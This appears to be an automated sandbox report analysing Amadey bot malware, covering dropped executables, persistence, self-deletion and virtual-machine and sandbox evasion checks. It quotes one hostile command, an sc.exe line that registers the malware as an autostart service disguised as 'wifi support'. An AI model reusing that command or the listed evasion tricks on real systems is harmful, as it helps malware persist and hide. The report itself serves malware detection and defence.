                          Source: FA5C.exe.5.dr, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 21.0.FA5C.exe.530000.0.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 21.0.FA5C.exe.530000.0.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 21.0.FA5C.exe.530000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 21.0.FA5C.exe.530000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 21.0.FA5C.exe.530000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 21.0.FA5C.exe.530000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 21.0.FA5C.exe.530000.3.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 21.0.FA5C.exe.530000.3.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 39.2.FA5C.exe.ab0000.1.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 39.2.FA5C.exe.ab0000.1.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 39.0.FA5C.exe.ab0000.7.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 39.0.FA5C.exe.ab0000.7.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'
                          Source: 39.0.FA5C.exe.ab0000.2.unpack, SG9KiyIbtdgGDf12qr/z2jc63fLkugS1X8Q9N.csHigh entropy of concatenated method names: '.cctor', 'H5FjWI2qLA', 'HImHehMQs', 'OdTftVXgR', 'fBSIsFavs', 'lVvm2jc63', 'QkuggS1X8', 'q9NYFG9Ki', 'Obt8dgGDf', '.ctor'
                          Source: 39.0.FA5C.exe.ab0000.2.unpack, A8rKktAdECkdokFCxq/I6976P597uOR8TGW3o.csHigh entropy of concatenated method names: 'PeB1xOW8Qv', 'eBxqprrF8', 'GOp1yJ6bgm', '.ctor', 'omeIBPs3wW', '.cctor', 'rvDbN6CZxdYVCYIgtN', 'LLL4M7JwFWGFTFjvp5', 'rHoI7BQHjq86lsr1Cq', 'uFomUGkb7RPvkdQrlH'

                          Persistence and Installation Behavior:

                          Yara detected Amadey bot
                          Source: Yara match File source: dump.pcap, type: PCAP
                          Source: Yara match File source: 00000030.00000002.934394338.00000000007C2000.00000004.00000001.sdmp, type: MEMORY
                          Source: Yara match File source: 00000030.00000002.934464446.000000000081C000.00000004.00000001.sdmp, type: MEMORY
                          Drops executables to the windows directory (C:\Windows) and starts them
                          Source: unknown Executable created and started: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\adijaeg
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\B3EB.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\BBBC.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\C487.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\7D38.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\CFE8.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\CF17.exe
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exe File created: C:\Users\user\AppData\Local\Temp\gaystiqf.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\FA5C.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\E2A6.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\8A6B.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Roaming\adijaeg
                          Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe (copy)
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\96DB.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\95C6.exe
                          Source: C:\Windows\explorer.exe File created: C:\Users\user\AppData\Local\Temp\A15C.exe
                          Source: C:\Windows\SysWOW64\cmd.exe File created: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe (copy)
                          Source: C:\Windows\SysWOW64\svchost.exe Registry key value modified: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Services\txlhcyih
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process created: C:\Windows\SysWOW64\sc.exe C:\Windows\System32\sc.exe" create txlhcyih binPath= "C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe /d\"C:\Users\user\AppData\Local\Temp\E2A6.exe\"" type= own start= auto DisplayName= "wifi support
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Code function: 19_2_00409A6B EntryPoint,SetErrorMode,SetErrorMode,SetErrorMode,SetUnhandledExceptionFilter,GetModuleHandleA,GetModuleFileNameA,GetCommandLineA,lstrlenA,ExitProcess,GetTempPathA,lstrcpyA,lstrcatA,lstrcatA,GetFileAttributesExA,DeleteFileA,GetEnvironmentVariableA,lstrcpyA,lstrlenA,RegOpenKeyExA,RegSetValueExA,RegCloseKey,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,lstrcatA,lstrcatA,lstrcatA,lstrcatA,wsprintfA,lstrcatA,lstrcatA,CreateProcessA,DeleteFileA,GetModuleHandleA,GetModuleFileNameA,GetDriveTypeA,GetCommandLineA,lstrlenA,StartServiceCtrlDispatcherA,DeleteFileA,GetLastError,Sleep,DeleteFileA,CreateThread,CreateThread,WSAStartup,CreateThread,Sleep,Sleep,GetTickCount,GetTickCount,GetTickCount,Sleep,

                          Hooking and other Techniques for Hiding and Protection:

                          Deletes itself after installation
                          Source: C:\Windows\explorer.exe File deleted: c:\users\user\desktop\sbxgiuihrd.exe
                          Hides that the sample has been downloaded from the Internet (zone.identifier)
                          Source: C:\Windows\explorer.exe File opened: C:\Users\user\AppData\Roaming\adijaeg:Zone.Identifier read attributes | delete
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe Code function: 18_2_0040C2E0 GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,GetProcAddress,LoadLibraryA,LoadLibraryA,GetProcAddress,GetProcAddress,
                          Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\System32\svchost.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: FAILCRITICALERRORS | NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\WerFault.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exe Process information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\netsh.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe Process information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe Process information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX
                          Source: C:\Windows\SysWOW64\svchost.exe Process information set: NOGPFAULTERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe Process information set: NOOPENFILEERRORBOX

                          Malware Analysis System Evasion:

                          Found evasive API chain (may stop execution after checking mutex)
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Evasive API call chain: CreateMutex,DecisionNodes,Sleep
                          Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
                          Source: adijaeg, 0000000A.00000002.767118658.00000000005EB000.00000004.00000020.sdmp | Binary or memory string: ASWHOOKLGN:
                          Found evasive API chain (may stop execution after checking locale)
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Evasive API call chain: GetUserDefaultLangID, ExitProcess
                          Checks if the current machine is a virtual machine (disk enumeration)
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Roaming\adijaeg | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Source: C:\Users\user\AppData\Local\Temp\95C6.exe | Key enumerated: HKEY_LOCAL_MACHINE\SYSTEM\ControlSet001\Enum\SCSI
                          Found evasive API chain (may stop execution after reading information in the PEB, e.g. number of processors)
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Evasive API call chain: GetPEB, DecisionNodes, Sleep
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Evasive API call chain: GetPEB, DecisionNodes, ExitProcess
                          Contains functionality to detect sleep reduction / modifications
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00406AA0
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00636CF0
                          Found evasive API chain (may stop execution after checking computer name)
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Evasive API call chain: GetComputerName,DecisionNodes,Sleep
                          Source: C:\Windows\explorer.exe TID: 5484 | Thread sleep time: -34200s >= -30000s
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe TID: 5648 | Thread sleep time: -922337203685477s >= -30000s
                          Source: C:\Windows\System32\svchost.exe TID: 6136 | Thread sleep time: -180000s >= -30000s
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 4292 | Thread sleep count: 46 > 30
                          Source: C:\Windows\SysWOW64\svchost.exe TID: 4292 | Thread sleep time: -46000s >= -30000s
                          Source: C:\Windows\System32\conhost.exe | Last function: Thread delayed
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe | Last function: Thread delayed
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exe | Evasive API call chain: GetModuleFileName,DecisionNodes,ExitProcess
                          Source: C:\Users\user\AppData\Local\Temp\FA5C.exe | Thread delayed: delay time: 922337203685477
                          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 625
                          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 441
                          Source: C:\Windows\explorer.exe | Window / User API: threadDelayed 376
                          Source: C:\Users\user\AppData\Local\Temp\8A6B.exe | API coverage: 8.1 %
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | API coverage: 6.4 %
                          Source: C:\Windows\SysWOW64\txlhcyih\gaystiqf.exe | API coverage: 4.7 %
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00636CF0
                          Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\C487.exe
                          Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\B3EB.exe
                          Source: C:\Windows\explorer.exe | Dropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\CF17.exe
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Evaded block: after key decision
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | API call chain: ExitProcess graph end node
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | API call chain: ExitProcess graph end node
                          Source: explorer.exe, 00000005.00000000.698292375.000000000A60E000.00000004.00000001.sdmp | Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: explorer.exe, 00000005.00000000.698343578.000000000A64D000.00000004.00000001.sdmp | Binary or memory string: War&Prod_VMware_SATA
                          Source: svchost.exe, 00000016.00000002.819381946.000001A7842C5000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAWdisplaycatalogmp.microsoft.com
                          Source: explorer.exe, 00000005.00000000.679650930.0000000006650000.00000004.00000001.sdmp | Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
                          Source: WerFault.exe, 00000011.00000002.805301079.0000000004FA6000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.819415155.000001A7842EC000.00000004.00000001.sdmp, svchost.exe, 00000016.00000002.819339202.000001A7842A4000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
                          Source: explorer.exe, 00000005.00000000.676763335.0000000004710000.00000004.00000001.sdmp | Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000[Wm
                          Source: explorer.exe, 00000005.00000000.698401055.000000000A716000.00000004.00000001.sdmp | Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&000000/
                          Source: explorer.exe, 00000005.00000000.681175465.000000000A784000.00000004.00000001.sdmp | Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000@
                          Source: WerFault.exe, 00000011.00000002.805439702.0000000005000000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.800381476.0000000005000000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.799626903.0000000005000000.00000004.00000001.sdmp, WerFault.exe, 00000011.00000003.800248547.0000000005000000.00000004.00000001.sdmp | Binary or memory string: Hyper-V RAW
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Process information queried: ProcessInformation
                          Source: C:\Users\user\AppData\Local\Temp\E2A6.exe | Code function: 19_2_00401D96 CreateThread,GetVersionExA,GetSystemInfo,GetModuleHandleA,GetProcAddress,GetCurrentProcess,GetTickCount,
                          Source: C:\Users\user\Desktop\sbxGIUIhRd.exe | Code function: 0_2_00419A51 GetPrivateProfileSectionW,BuildCommDCBAndTimeoutsW,CreateMailslotA,CallNamedPipeA,ReleaseSemaphore,FindAtomA,SystemTimeToTzSpecificLocalTime,SetComputerNameExA,SetConsoleCursorInfo,TlsGetValue,CopyFileA,GetLongPathNameW,SetVolumeMountPointW,SetProcessPriorityBoost,FreeEnvironmentStringsA,GetDriveTypeA,FindFirstFileExW,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00405E40 wsprintfA,FindFirstFileA,lstrcat,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,lstrlen,PathMatchSpecA,CopyFileA,DeleteFileA,PathMatchSpecA,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_004096E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,StrCmpCA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00401280 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,wsprintfA,wsprintfA,PathMatchSpecA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00401090 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00409B40 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,wsprintfA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00409970 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_004087E0 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_00638A30 wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,wsprintfA,StrCmpCA,StrCmpCA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,StrCmpCA,GetCurrentDirectoryA,lstrcat,lstrcat,CopyFileA,DeleteFileA,FindNextFileA,FindClose,
                          Source: C:\Users\user\AppData\Local\Temp\CFE8.exe | Code function: 18_2_006312E0 SetCurrentDirectoryA,wsprintfA,FindFirstFileA,StrCmpCA,StrCmpCA,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,lstrcat,FindNextFileA,FindClose,
